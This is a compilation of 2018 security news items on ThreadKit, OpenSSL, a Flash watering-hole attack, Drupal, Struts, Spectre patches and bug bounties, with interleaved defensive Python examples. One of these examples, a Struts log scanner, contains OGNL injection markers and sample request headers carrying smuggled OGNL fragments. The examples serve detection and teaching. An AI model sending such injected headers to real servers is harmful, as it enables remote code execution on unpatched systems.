The exploit builder kit was initially discovered in October 2017, but Proofpoint's researchers have linked it to activity dating back to June 2017. The builder kit shows similarities to Microsoft Word Intruder (MWI), but is a new tool called ThreadKit.

In June 2017, the kit was being advertised in a forum post as being able to create documents with embedded executables and embedded decoy documents, and several campaigns featuring such documents were observed that month. The documents would perform an initial check-in to the command and control (C&C) server, a tactic also used by MWI.

The documents targeted CVE-2017-0199 and focused on downloading and executing an HTA file, which would then download the decoy and a malicious VB script to extract and run the embedded executable. The payload was Smoke Loader, which in turn downloaded banking malware.

In October, ThreadKit started targeting CVE-2017-8759 as well, but continued to use the initial C&C check-in and the HTA file to execute the embedded executable, Proofpoint says. However, changes were made to the way the exploit documents operate, and new exploits were integrated as well.

In November, ThreadKit was quick to incorporate exploits for newly disclosed Microsoft Office vulnerabilities and started being advertised as capable of targeting CVE-2017-11882 too. Soon after, campaigns featuring the previously observed check-in started to emerge.

In February and March 2018, the kit was embedding new exploits, targeting vulnerabilities such as an Adobe Flash zero-day (CVE-2018-4878) and several new Microsoft Office vulnerabilities, including CVE-2018-0802 and CVE-2017-8570.

At the same time, the researchers noticed a large spike in email campaigns featuring ThreadKit-generated Office attachments packing these exploits. The exploits appear copied from proofs of concept available on a researcher’s GitHub repo.

In these attacks, the attachments drop the contained packager objects into the temp folder; the exploits then execute the dropped scriptlet file, which runs the dropped batch files, which in turn launch the executable.
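The chain above starts with OLE objects embedded in the attachment, so a cheap triage step is to list the objects a document declares before anyone opens it. The script below is an added example written for this page, not Proofpoint's or ThreadKit's code, and it assumes the attachment is a DOCX (a ZIP container; RTF would need a separate parser). It reads the `o:OLEObject` tags in `word/document.xml`, lists the parts under `word/embeddings/`, and flags the `Package` ProgID (the OLE Packager class used to embed arbitrary files such as scriptlets, batch files and executables) and `Equation.3` (the Equation Editor object targeted by the CVE-2017-11882 / CVE-2018-0802 family). `build_sample_docx` constructs a minimal document for the demonstration; it is not a real ThreadKit sample.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Namespaces used by Word for embedded OLE objects and part relationships.
NS_O = "urn:schemas-microsoft-com:office:office"
NS_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
NS_W = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

# ProgIDs worth a second look in inbound mail (watch list is my own choice).
SUSPICIOUS_PROGIDS = {
    "Package": "OLE Packager object (embedded arbitrary file)",
    "Equation.3": "Equation Editor object (CVE-2017-11882 / CVE-2018-0802 family)",
}


def inspect_docx(data: bytes) -> dict:
    """Enumerate OLE objects declared by a DOCX and flag suspicious ProgIDs.

    Returns {"objects": [(progid, rId), ...],
             "embedded_parts": [zip member names under word/embeddings/],
             "suspicious": [(progid, reason), ...]}.
    """
    result = {"objects": [], "embedded_parts": [], "suspicious": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        result["embedded_parts"] = sorted(
            n for n in names if n.startswith("word/embeddings/"))
        if "word/document.xml" not in names:
            return result
        root = ET.fromstring(zf.read("word/document.xml"))
    for ole in root.iter(f"{{{NS_O}}}OLEObject"):
        progid = ole.get("ProgID", "")
        rid = ole.get(f"{{{NS_R}}}id", "")
        result["objects"].append((progid, rid))
        if progid in SUSPICIOUS_PROGIDS:
            result["suspicious"].append((progid, SUSPICIOUS_PROGIDS[progid]))
    return result


def build_sample_docx(progids) -> bytes:
    """Constructed minimal DOCX (not a real malicious sample) with one
    OLEObject tag per ProgID and a dummy embedded part for each."""
    tags = "".join(
        f'<o:OLEObject Type="Embed" ProgID="{p}" DrawAspect="Icon" '
        f'ObjectID="_{i}" r:id="rId{i}"/>'
        for i, p in enumerate(progids, start=1))
    document_xml = (
        f'<w:document xmlns:w="{NS_W}" xmlns:o="{NS_O}" xmlns:r="{NS_R}">'
        f'<w:body><w:p><w:r><w:object>{tags}</w:object></w:r></w:p></w:body>'
        '</w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", document_xml)
        for i, _ in enumerate(progids, start=1):
            # OLE compound-file magic only; the body is irrelevant here.
            zf.writestr(f"word/embeddings/oleObject{i}.bin", b"\xd0\xcf\x11\xe0")
    return buf.getvalue()


if __name__ == "__main__":
    report = inspect_docx(build_sample_docx(["Package", "Equation.3"]))
    for progid, reason in report["suspicious"]:
        print(f"FLAG {progid}: {reason}")
```

The ProgID is attacker-controlled, so treat a match as a reason to detonate the file in a sandbox rather than as proof, and treat a `word/embeddings/` part with no matching tag (or the reverse) as equally suspicious.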

Proofpoint found that not all ThreadKit documents contain a valid URL for the statistics check-in (some contain placeholder URLs). Furthermore, not all documents followed the same execution chain, with some scripts modified to perform other actions, a customization that may be provided as a service by the kit author.

“In 2017, several new vulnerabilities entered regular use by threat actors and the first months of 2018 have added to that repertoire. Document exploit builder kits like ThreadKit enable even low-skilled threat actors to take advantage of the latest vulnerabilities to distribute malware. Organizations and individuals can mitigate the risk from ThreadKit and other document exploit-based attacks by ensuring that clients are patched for the latest vulnerabilities in Microsoft Office and other applications,” Proofpoint concludes.


First OpenSSL Updates in 2018 Patch Three Flaws
27.3.2018 securityweek
Vulnerebility

The first round of security updates released in 2018 for OpenSSL patch a total of three vulnerabilities, but none of them appears to be serious.

OpenSSL versions 1.1.0h and 1.0.2o patch CVE-2018-0739, a denial-of-service (DoS) vulnerability discovered using Google’s OSS-Fuzz service, which has uncovered several OpenSSL flaws in the past.

The security hole, rated “moderate,” is related to constructed ASN.1 types with a recursive definition.

“Constructed ASN.1 types with a recursive definition (such as can be found in PKCS7) could eventually exceed the stack given malicious input with excessive recursion,” the OpenSSL Project said in its advisory.
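The failure mode here is unbounded recursion driven by attacker-shaped input, and the fix class is an explicit depth budget checked before recursing. The parser below is an added example for this page, not OpenSSL's code: a minimal DER tag-length-value walker that recurses into constructed types (bit 0x20 of the tag, as in SEQUENCE) and rejects input nested deeper than `max_depth`. `nest()` constructs a NULL wrapped in n SEQUENCEs to stand in for malicious input; the default limit of 32 is my own choice, not OpenSSL's.

```python
def encode_length(n: int) -> bytes:
    """DER length: short form below 0x80, else 0x80|len followed by big-endian bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def wrap_sequence(inner: bytes) -> bytes:
    """Wrap already-encoded content in a constructed SEQUENCE (tag 0x30)."""
    return b"\x30" + encode_length(len(inner)) + inner


def nest(depth: int) -> bytes:
    """Constructed test input: a NULL wrapped in `depth` SEQUENCEs."""
    data = b"\x05\x00"
    for _ in range(depth):
        data = wrap_sequence(data)
    return data


def parse_der(data: bytes, max_depth: int = 32, _depth: int = 0) -> list:
    """Parse a sequence of DER TLVs into [(tag, value-or-children), ...].

    Constructed tags recurse; the depth check runs before any work is done
    at the new level, so the cost of rejected input is bounded.
    """
    if _depth > max_depth:
        raise ValueError(f"ASN.1 nesting exceeds {max_depth} levels")
    items = []
    i = 0
    while i < len(data):
        tag = data[i]
        i += 1
        if tag & 0x1F == 0x1F:
            raise ValueError("multi-byte tag numbers not supported")
        if i >= len(data):
            raise ValueError("truncated length")
        length = data[i]
        i += 1
        if length & 0x80:  # long form: number of length bytes follows
            n = length & 0x7F
            if n == 0 or n > 4:
                raise ValueError("unsupported length encoding")
            if i + n > len(data):
                raise ValueError("truncated long-form length")
            length = int.from_bytes(data[i:i + n], "big")
            i += n
        if i + length > len(data):
            raise ValueError("value runs past end of input")
        value = data[i:i + length]
        i += length
        if tag & 0x20:  # constructed: descend one level
            items.append((tag, parse_der(value, max_depth, _depth + 1)))
        else:
            items.append((tag, value))
    return items


def accepts(data: bytes, max_depth: int = 32) -> bool:
    """True if the input parses within the depth budget, False if rejected."""
    try:
        parse_der(data, max_depth)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print(parse_der(nest(2)))            # [(48, [(48, [(5, b'')])])]
    print(accepts(nest(32)), accepts(nest(33)))
```

In Python a runaway recursion would eventually be stopped by the interpreter's own recursion limit; in C there is no such net, the stack is simply exceeded, which is why the parser has to fail by policy well before it fails by resource exhaustion.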

Another moderate severity flaw, which only affects the 1.1.0 branch, is CVE-2018-0733. This is an implementation bug in the PA-RISC CRYPTO_memcmp function, and it allows an attacker to forge authenticated messages more easily than should be possible.

The OpenSSL Project learned about this vulnerability in early March from IBM. Only HP-UX PA-RISC systems are impacted.

Finally, OpenSSL 1.1.0h fixes an overflow bug that could allow an attacker to access TLS-protected communications. The vulnerability, CVE-2017-3738, was first disclosed in December 2017, but since an attack is not easy to carry out the issue was assigned a low severity rating and has only now been patched.

Four rounds of security updates were released for OpenSSL last year, and only one of the eight fixed vulnerabilities was classified as high severity.


Experts uncovered a watering hole attack on leading Hong Kong Telecom Site exploiting CVE-2018-4878 flaw
27.3.2018 securityaffairs
Vulnerebility

Researchers at Morphisec have uncovered a watering hole attack on leading Hong Kong Telecom website exploiting the CVE-2018-4878 flash vulnerability.
Security experts at Morphisec have discovered a watering hole attack on leading Hong Kong Telecom website exploiting the CVE-2018-4878 flash vulnerability.

In a watering hole attack, hackers compromise websites likely to be visited by their intended victims. This technique requires more effort than a common spear-phishing attack and is usually associated with APT groups.


In early February, Adobe rolled out an emergency patch that fixed two critical remote code execution vulnerabilities, including CVE-2018-4878, after a North Korea-linked APT group was spotted exploiting it in targeted attacks.

At the time, South Korea’s Internet & Security Agency (KISA) warned of a Flash zero-day vulnerability (CVE-2018-4878) that has reportedly been exploited in attacks by North Korea’s hackers.

By the end of February, the researchers at Morphisec reported that threat actors were exploiting the use-after-free flaw to deliver malware.

“On March 21, 2018, Morphisec Labs began investigating the compromised website of a leading Hong Kong Telecommunications company after being alerted to it by malware hunter @PhysicalDrive0.” reads the analysis published by Morphisec.

“The investigation, conducted by Morphisec researchers Michael Gorelik and Assaf Kachlon, determined that the Telecom group’s corporate site had indeed been hacked. Attackers added an embedded Adobe Flash file that exploits the Flash vulnerability CVE-2018-4878 on the main home.php page. The attack is a textbook case of a watering hole attack.”

The threat actors behind the attack adopted advanced evasion techniques: the malicious code is purely fileless, with no persistence and no trace on disk. Also notable is the use of a custom protocol over port 443.

The Flash exploit used in this attack is similar to previously analyzed CVE-2018-4878 exploits, but it employs a different shellcode that is executed after exploitation.

“Generally, this advanced type of watering hole attack is highly targeted in nature and suggests that a very advanced group is behind it,” continues the post.

“The Flash exploit that was delivered has a high degree of similarity to the previously published analysis of the CVE-2018-4878. The major difference in this exploit is in the shellcode that is executed post exploitation”

The shellcode launches rundll32.exe and overwrites the process's memory with malicious code designed to download additional code directly into the memory of the rundll32 process.

The additional code downloaded directly into the memory of the rundll32 process includes Metasploit Meterpreter and Mimikatz modules.

Analysis of the modules revealed that they were compiled on February 15, a few days before the attack.

“As our analysis shows, this watering hole attack is of advanced evasive nature. Being purely fileless, without persistence or any trace on the disk, and the use of custom protocol on a non-filtered port, makes it a perfect stepping stone for a highly targeted attack chain. This clearly suggests that very advanced threat actors are responsible for it,” Morphisec says.

The experts noticed that despite the advanced evasive features, the attack used basic Metasploit framework components that were compiled just before the attack and did not show any sophistication, obfuscation or evasion.

At this time, the company hasn’t attributed the attack to a specific threat actor, it is still investigating the incident.


Drupal to Patch Highly Critical Vulnerability This Week
26.3.2018 securityweek
Vulnerebility

Drupal announced plans to release a security update for Drupal 7.x, 8.3.x, 8.4.x, and 8.5.x on March 28, 2018, aimed at addressing a highly critical vulnerability.

The Drupal security team hasn’t provided information on the vulnerability and says it won’t release any details on it until the patch arrives. An advisory containing all the necessary information will be published on March 28.

Before that, however, the team advises customers to be prepared for the update’s release and to apply it immediately after it is published, given its high exploitation potential.

“The Drupal Security Team urges you to reserve time for core updates at that time because exploits might be developed within hours or days,” Drupal announced.

The highly popular content management system (CMS) powers over one million sites and is used by a large number of e-commerce businesses.

Due to the widespread use of Drupal, currently the second most used CMS after WordPress, the security update will be released for Drupal versions 8.3.x and 8.4.x as well, although they are no longer supported.

“While […] we don't normally provide security releases for unsupported minor releases, given the potential severity of this issue, we are providing 8.3.x and 8.4.x releases that include the fix for sites which have not yet had a chance to update to 8.5.0,” Drupal says.

The Drupal security team urges customers to update to the appropriate release for their CMS version as soon as it is made available on March 28.

Thus, sites on 8.3.x should be updated to the upcoming 8.3.x iteration and then to the latest 8.5.x security release in the next month, while sites on 8.4.x should apply the next 8.4.x release and then upgrade to 8.5.x as well.

All sites on Drupal versions 7.x or 8.5.x should immediately apply the update when the advisory is released, using the normal update methods.

All of the appropriate version numbers for the impacted Drupal 8 branches will be listed in the upcoming advisory.

“Your site's update report page will recommend the 8.5.x release even if you are on 8.3.x or 8.4.x, but temporarily updating to the provided backport for your site's current version will ensure you can update quickly without the possible side effects of a minor version update,” Drupal also notes.


One Year Later, Hackers Still Target Apache Struts Flaw
26.3.2018 securityweek
Vulnerebility

One year after researchers saw the first attempts to exploit a critical remote code execution flaw affecting the Apache Struts 2 framework, hackers continue to scan the Web for vulnerable servers.

The vulnerability in question, tracked as CVE-2017-5638, affects Struts 2.3.5 through 2.3.31 and Struts 2.5 through 2.5.10. The security hole was addressed on March 6, 2017 with the release of versions 2.3.32 and 2.5.10.1.

The bug, caused by improper handling of the Content-Type header, can be triggered when performing file uploads with the Jakarta Multipart parser, and it allows a remote, unauthenticated attacker to execute arbitrary OS commands on the targeted system.

The first exploitation attempts were spotted one day after the patch was released, shortly after someone made available a proof-of-concept (PoC) exploit. Some of the attacks scanned servers in search of vulnerable Struts installations, while others were set up to deliver malware.

Guy Bruneau, researcher and handler at the SANS Internet Storm Center, reported over the weekend that his honeypot had caught a significant number of attempts to exploit CVE-2017-5638 over the past two weeks.

The expert said his honeypot recorded 57 exploitation attempts on Sunday, on ports 80, 8080 and 443. The attacks, which appear to rely on a publicly available PoC exploit, involved one of two requests designed to check if a system is vulnerable.

Bruneau told SecurityWeek that he has yet to see any payloads. The researcher noticed scans a few times a week starting on March 13, coming from IP addresses in Asia.

“The actors are either looking for unpatched servers or new installations that have not been secured properly,” Bruneau said.
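The probes Bruneau describes ride on the Content-Type header, which is exactly where the Jakarta Multipart parser's error path lets an OGNL expression into the request. The Python below is an added detection example, not code from SANS ISC or SecurityWeek: it scans a constructed, pipe-delimited request log (timestamp, source, method, path, Content-Type value, as a honeypot or reverse proxy might record them) for OGNL markers in the header value, after URL-decoding it repeatedly so that a double-encoded `%{` is still caught. The log lines and the marker list are my own assumptions, not Bruneau's captures.

```python
import re
from urllib.parse import unquote

# Tokens that never belong in a legitimate Content-Type value but show up
# whenever an OGNL expression is smuggled through the header.
OGNL_MARKERS = re.compile(r"%\{|\$\{|#_memberAccess|#context|@ognl\.", re.IGNORECASE)


def decode_fully(value: str, rounds: int = 3) -> str:
    """URL-decode up to `rounds` times so nested encodings are unwrapped."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_content_type(value: str):
    """Return a reason string if the Content-Type value carries OGNL, else None."""
    match = OGNL_MARKERS.search(decode_fully(value))
    if match:
        return f"OGNL marker {match.group(0)!r} in Content-Type"
    return None


def parse_line(line: str) -> dict:
    """Split one constructed log record: ts|src|method|path|content-type."""
    ts, src, method, path, ctype = line.split("|", 4)
    return {"ts": ts, "src": src, "method": method, "path": path,
            "content_type": ctype}


def scan_log(lines) -> list:
    """Return the records whose Content-Type looks like a CVE-2017-5638 probe."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        reason = classify_content_type(rec["content_type"])
        if reason:
            rec["reason"] = reason
            hits.append(rec)
    return hits


# Constructed sample traffic (documentation-range IPs), not real captures.
SAMPLE_LOG = [
    "2018-03-25T10:02:11Z|203.0.113.7|GET|/struts2-showcase/index.action|%{#a='multipart/form-data'}",
    "2018-03-25T10:02:12Z|198.51.100.4|POST|/upload.action|multipart/form-data; boundary=----x",
    "2018-03-25T10:03:40Z|203.0.113.9|GET|/index.action|%25%7B%23a%7D",
    "2018-03-25T10:04:01Z|192.0.2.33|GET|/|text/html",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["src"], hit["path"], hit["reason"])
```

The third record is the double-encoded case: a single decode yields `%{#a}`, which a naive substring match on the raw header would miss. Patching remains the fix; this only tells you who is knocking.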

The CVE-2017-5638 vulnerability is significant because it was exploited by cybercriminals last year to hack into the systems of U.S. credit reporting agency Equifax. Attackers had access to Equifax systems for more than two months and obtained information on over 145 million people.

The same vulnerability was also leveraged late last year in a campaign that involved NSA-linked exploits and cryptocurrency miners.

This is not the only Apache Struts 2 vulnerability exploited by malicious actors since last year. In September, security firms warned that a remote code execution flaw tracked as CVE-2017-9805 had been exploited to deliver malware.


A “highly critical” flaw affects Drupal 7 and 8 core, Drupal security updates expected on March 28th
23.3.2018 securityweek
Vulnerebility

Drupal Security Team confirmed that a “highly critical” vulnerability affects Drupal 7 and 8 core and announced the availability of security updates on March 28th.
A “highly critical” vulnerability affects Drupal 7 and 8 core and Drupal developers are currently working to address it.

Drupal maintainers plan to issue a security release of Drupal 7.x, 8.3.x, 8.4.x, and 8.5.x on March 28th 2018 between 18:00 and 19:30 UTC.

The security team asked to reserve time for core updates fearing that threat actors could exploit the “highly critical security vulnerability.”

“There will be a security release of Drupal 7.x, 8.3.x, 8.4.x, and 8.5.x on March 28th 2018 between 18:00 – 19:30 UTC, one week from the publication of this document, that will fix a highly critical security vulnerability.” reads the advisory sent to the developers.

“The Drupal Security Team urges you to reserve time for core updates at that time because exploits might be developed within hours or days. “

Both Drupal 8.3.x and 8.4.x are not supported, but due to the severity of the flaw the Drupal Security Team decided to address it with specific security updates.

The Drupal CMS currently runs on over one million websites, it is the second most popular content management system behind WordPress.

“While Drupal 8.3.x and 8.4.x are no longer supported and we don’t normally provide security releases for unsupported minor releases, given the potential severity of this issue, we are providing 8.3.x and 8.4.x releases that include the fix for sites which have not yet had a chance to update to 8.5.0.” continues the advisory.

The Drupal security team strongly recommends the following:

Sites on 8.3.x should immediately update to the 8.3.x release that will be provided in the advisory, and then plan to update to the latest 8.5.x security release in the next month.
Sites on 8.4.x should immediately update to the 8.4.x release that will be provided in the advisory, and then plan to update to the latest 8.5.x security release in the next month.
Sites on 7.x or 8.5.x can immediately update when the advisory is released using the normal procedure.


Google is distributing more Meltdown and Spectre Patches for Chrome OS devices
23.3.2018 securityweek
Vulnerebility

Google announced that mitigations for devices with Intel processors affected by the Spectre and Meltdown vulnerabilities are included in the latest stable channel update for its Chrome OS operating system.
The Meltdown and Spectre attacks could be exploited by attackers to bypass memory isolation mechanisms and access target sensitive data.

The Meltdown attack could allow attackers to read the entire physical memory of the target machines stealing credentials, personal information, and more.

Meltdown exploits speculative execution to breach the isolation between user applications and the operating system, so that any application can read all of system memory.

The Spectre attack allows user-mode applications to extract information from other processes running on the same system. It can also be exploited to extract information from its own process via code, for example, a malicious JavaScript can be used to extract login cookies for other sites from the browser’s memory.

The Spectre attack breaks the isolation between different applications, allowing information to leak from the kernel to user programs, as well as from virtualization hypervisors to guest systems.

Meltdown attacks exploit CVE-2017-5754, while Spectre attacks exploit CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2). According to the experts, Meltdown and Spectre Variant 1 can be addressed in software, while Spectre Variant 2 also requires a microcode update for the affected processors. Software mitigations include kernel page-table isolation (KPTI/KAISER) and Google's Retpoline technique.

Google addressed the Meltdown issue in Chrome OS with the release of version 63 in December, more than two weeks before Google Project Zero disclosed the flaws.

Chrome OS Spectre patches

Google rolled out the KPTI/KAISER patch to address the flaw in 70 Intel-based Chromebook models from various vendors, including Acer, ASUS, Dell, HP, Lenovo, and Samsung.

This week the company released Chrome OS 65, which also includes the KPTI mitigation against Meltdown for additional Intel-based systems running version 3.14 of the kernel.

According to Google, all older Chromebooks with Intel processors should get the KPTI mitigation for Meltdown with the release of Chrome OS 66 that is scheduled for release on April 24.

“The Stable channel has been updated to 65.0.3325.167 (Platform version: 10323.58.0/1) for most Chrome OS devices. This build contains a number of bug fixes and security updates.” reads the Google announcement.

“Intel devices on 3.14 kernels received the KPTI mitigation against Meltdown with Chrome OS 65.

All Intel devices received the Retpoline mitigation against Spectre variant 2 with Chrome OS 65.”

Chrome OS 65 also includes the Retpoline mitigation for Spectre Variant 2 on all Intel-based devices. Google also noted that Spectre Variant 1 attacks can abuse the eBPF feature in the Linux kernel, but Chrome OS disables eBPF.

Chrome OS devices with ARM processors are not affected by Meltdown. Google is still working on mitigations for the Spectre issues on those devices.

“On ARM devices we’ve started integrating firmware and kernel patches supplied by ARM. Development is still ongoing so release timelines have not been finalized. ARM devices will receive updated firmware and kernels before they enable virtualization features.” concluded Google.


Netflix Launches Public Bug Bounty Program
22.3.2018 securityweek
Vulnerebility

Netflix announced on Wednesday the launch of a public bug bounty program with rewards of up to $15,000, and Dropbox has made some changes to its vulnerability disclosure policy, promising not to sue researchers.

Netflix has had a vulnerability disclosure policy for the past 5 years and a private bug bounty program since September 2016. The company has now decided to make its bug bounty initiative public through the Bugcrowd platform.

Its vulnerability disclosure policy and private bug bounty have helped Netflix patch 190 vulnerabilities. The private program started with 100 of Bugcrowd’s top researchers, but more than 700 white hat hackers were later invited in preparation for the public program.

Researchers can earn between $100 and $15,000 for flaws affecting one of several Netflix domains and the mobile applications for iOS and Android. The company claims the highest reward paid out to date is $15,000 for a critical security hole.

The types of vulnerabilities that can be submitted include cross-site scripting (XSS), cross-site request forgery (CSRF), SQL injection, authentication and authorization, data exposure, remote code execution, redirection, business logic, MSL protocol, and mobile API issues. Netflix says it acknowledges vulnerability reports, on average, in less than 3 days.

“Engineers at Netflix have a high degree of ownership for the security of their products and this helps us address reports quickly,” Netflix said in a blog post. “Our security engineers also have the autonomy and freedom to make reward decisions quickly based on the reward matrix and bug severity. This ultimately helps create an efficient and seamless experience for researchers which is important for engagement in the program.”

Dropbox makes changes to vulnerability disclosure policy

Dropbox has not set a maximum amount of money that researchers can earn through its HackerOne-based bug bounty program. To date, the company has paid out more than $200,000 for over 220 vulnerabilities.

However, the changes made by the company are not related to bounty amounts and instead they focus on the vulnerability disclosure policy and assuring researchers that they will not get sued even if they accidentally violate terms of the program.

Several researchers have faced lawsuits recently over vulnerability disclosures, and Dropbox wants to help avoid such situations. The company has promised “to not initiate legal action for security research conducted pursuant to the policy, including good faith, accidental violations.”

Dropbox says it will allow researchers to publish the details of the vulnerabilities they find, and will not file Digital Millennium Copyright Act (DMCA) action against them as long as their activities are consistent with the company’s vulnerability disclosure policy.

The new policy includes a clear statement that research constitutes “authorized conduct” under the controversial Computer Fraud and Abuse Act (CFAA). Furthermore, as long as the researcher complies with Dropbox’s policy, the company will clearly state that their actions were authorized in case of a lawsuit initiated by a third party.

“We’re also happy to announce that all of the text in our VDP is a freely copyable template,” Dropbox said. “We’ve done this because we’d like to see others take a similar approach. We’ve put some effort in to this across our legal and security teams and if you like what you see, please use it.”


More Chrome OS Devices Receive Meltdown, Spectre Patches
22.3.2018 securityweek
Vulnerebility

The latest stable channel update for Google’s Chrome OS operating system includes mitigations for devices with Intel processors affected by the Spectre and Meltdown vulnerabilities.

Meltdown and Spectre attacks exploit design flaws in Intel, AMD, ARM and other processors. They allow malicious applications to bypass memory isolation mechanisms and gain access to sensitive data.

Meltdown attacks are possible due to CVE-2017-5754, while Spectre attacks are possible due to CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2). While Meltdown and Variant 1 can be addressed with software updates, Variant 2 also requires microcode updates from the manufacturers of the impacted processors. Software mitigations include kernel page-table isolation (KPTI/KAISER) and a technique developed by Google called Retpoline.

Meltdown and Spectre were discovered independently by three teams of researchers. Google Project Zero researcher Jann Horn was one of the experts who found the flaws, which meant the company had enough time to work on patches before the details of the vulnerabilities were disclosed.

In the case of Chrome OS, Google rolled out the first Meltdown mitigations with the release of version 63 in mid-December, more than two weeks before public disclosure.

At the time, Google rolled out the KPTI/KAISER patch to roughly 70 Intel-based Chromebook models from Acer, ASUS, Dell, HP, Lenovo, Samsung and others.

Google released Chrome OS 65 on Monday and informed users that it includes the KPTI mitigation against Meltdown for additional Intel devices with version 3.14 of the kernel.

A status page created by Google to help users track the availability of Meltdown and Spectre patches for Chrome OS shows that all older Chromebooks with Intel processors, including with kernel versions 3.14 and 3.8, should get the KPTI mitigation for Meltdown with the release of Chrome OS 66, which is currently scheduled for release on April 24.

Chrome OS 65 also brings the Retpoline mitigation for Spectre Variant 2 to all devices with Intel processors. Google noted that Variant 2 can be exploited using virtualization, and while Chrome OS devices don’t use this type of feature, some measures have been taken to proactively protect users.

In the case of Spectre Variant 1, the eBPF feature in the Linux kernel can be abused for exploitation, but Chrome OS is not impacted as it disables eBPF, Google said.

The tech giant informs customers that Chrome OS devices with ARM processors are not affected by Meltdown. As for the Spectre vulnerabilities, Google says it has started integrating the firmware and kernel patches supplied by ARM, but release timelines have not been finalized.


GitHub Security Alerts Lead to Fewer Vulnerable Code Libraries
22.3.2018 securityweek
Vulnerebility

GitHub says the introduction of security alerts last year has led to a significantly smaller number of vulnerable code libraries on the platform.

The code hosting service announced in mid-November 2017 the introduction of a new security feature designed to warn developers if the software libraries used by their projects contain any known vulnerabilities.

The new feature looks for vulnerable Ruby gems and JavaScript NPM packages based on MITRE’s Common Vulnerabilities and Exposures (CVE) list. When a new flaw is added to this list, all repositories that use the affected version are identified and their maintainers informed. Users can choose to be notified via the GitHub user interface or via email.

When it introduced security alerts, GitHub compared the list of vulnerable libraries to the Dependency Graph in all public code repositories.

The Dependency Graph is a feature in the Insights section of GitHub that lists the libraries used by a project. Since the introduction of security alerts, this section also informs users about vulnerable dependencies, including CVE identifiers and severity of the flaws, and provides advice on how to address the issues.
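The matching step GitHub describes (a repository's resolved dependencies against a list of affected versions) reduces to a lockfile parser plus a version-range check. The script below is an added example, not GitHub's code: it parses the `specs:` section of a constructed Gemfile.lock and checks each resolved gem against a constructed advisory table keyed by gem name with affected-version ranges. The lockfile contents and the `EXAMPLE-…` identifiers are made up for the demonstration and do not refer to real advisories.

```python
import re
from operator import eq, ge, gt, le, lt

# Constructed Gemfile.lock excerpt (not taken from any real project).
SAMPLE_LOCKFILE = """\
GEM
  remote: https://rubygems.org/
  specs:
    nokogiri (1.8.1)
      mini_portile2 (~> 2.3.0)
    mini_portile2 (2.3.0)
    rack (1.6.8)
    loofah (2.1.1)
      nokogiri (>= 1.5.9)

PLATFORMS
  ruby
"""

# Constructed advisory table: gem -> [(affected range, placeholder id), ...].
SAMPLE_ADVISORIES = {
    "loofah": [(">= 2.0.0, < 2.2.1", "EXAMPLE-0001")],
    "rack": [("< 1.6.9", "EXAMPLE-0002")],
}

# Exactly four spaces of indent marks a resolved spec; six marks its dependencies.
SPEC_LINE = re.compile(r"^    (\S+) \(([^)]+)\)$")


def parse_lockfile(text: str) -> dict:
    """Return {gem_name: resolved_version} from the specs: block of a Gemfile.lock."""
    deps = {}
    in_specs = False
    for line in text.splitlines():
        if line.strip() == "specs:":
            in_specs = True
            continue
        if in_specs and not line.startswith("  "):  # blank line or next section
            in_specs = False
            continue
        if in_specs:
            m = SPEC_LINE.match(line)
            if m:
                deps[m.group(1)] = m.group(2)
    return deps


def vtuple(version: str) -> tuple:
    """Numeric components for comparison; non-numeric parts (prereleases) count as 0."""
    return tuple(int(p) if p.isdigit() else 0 for p in version.split("."))


OPS = {"<": lt, "<=": le, ">": gt, ">=": ge, "=": eq}


def in_range(version: str, spec: str) -> bool:
    """True if `version` satisfies every comma-separated clause such as '>= 2.0.0, < 2.2.1'."""
    for clause in spec.split(","):
        op, bound = clause.split()
        if not OPS[op](vtuple(version), vtuple(bound)):
            return False
    return True


def find_vulnerable(deps: dict, advisories: dict) -> list:
    """Return (gem, version, advisory id) for every resolved gem inside an affected range."""
    hits = []
    for name, version in deps.items():
        for affected, ident in advisories.get(name, []):
            if in_range(version, affected):
                hits.append((name, version, ident))
    return hits


if __name__ == "__main__":
    for gem, ver, ident in find_vulnerable(parse_lockfile(SAMPLE_LOCKFILE), SAMPLE_ADVISORIES):
        print(f"{gem} {ver} affected by {ident}")
```

The parser deliberately reads only the four-space spec lines, so a gem that appears solely as a transitive requirement (the six-space lines) is judged by its resolved version, not by the constraint that pulled it in. Prerelease suffixes are flattened to zero here; a production matcher needs a real semantic-version comparison.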

The initial scan conducted by GitHub revealed more than 4 million vulnerabilities in over 500,000 repositories. Affected users were immediately notified and by December 1, roughly two weeks after the launch of the new feature, more than 450,000 of the flaws were addressed either by updating the affected library or removing it altogether.

According to GitHub, vulnerabilities are in a vast majority of cases addressed within a week by active developers.

“Since [December 1], our rate of vulnerabilities resolved in the first seven days of detection has been about 30 percent,” GitHub said. “Additionally, 15 percent of alerts are dismissed within seven days—that means nearly half of all alerts are responded to within a week. Of the remaining alerts that are unaddressed or unresolved, the majority belong to repositories that have not had a contribution in the last 90 days.”

GitHub was recently hit by a record-breaking distributed denial-of-service (DDoS) attack that peaked at 1.3 Tbps, but the service was down for less than 10 minutes.



AMD Chip Flaws Confirmed by More Researchers
21.3.2018 securityweek
Vulnerebility

Another cybersecurity firm has independently confirmed some of the AMD processor vulnerabilities discovered by Israel-based CTS Labs, but the controversial disclosure has not had a significant impact on the value of the chip giant’s stock.

CTS Labs last week published a brief description of 13 allegedly critical vulnerabilities and backdoors found in EPYC and Ryzen processors from AMD. The company says the flaws can be exploited for arbitrary code execution, bypassing security features (e.g. Windows Defender Credential Guard, Secure Boot), stealing data, helping malware become resilient against security products, and damaging hardware.

The flaws have been dubbed MASTERKEY, RYZENFALL, FALLOUT and CHIMERA, and exploiting them requires elevated privileges on the targeted machine, though physical access is not required. The security firm says it will not disclose technical details any time soon in order to prevent abuse.

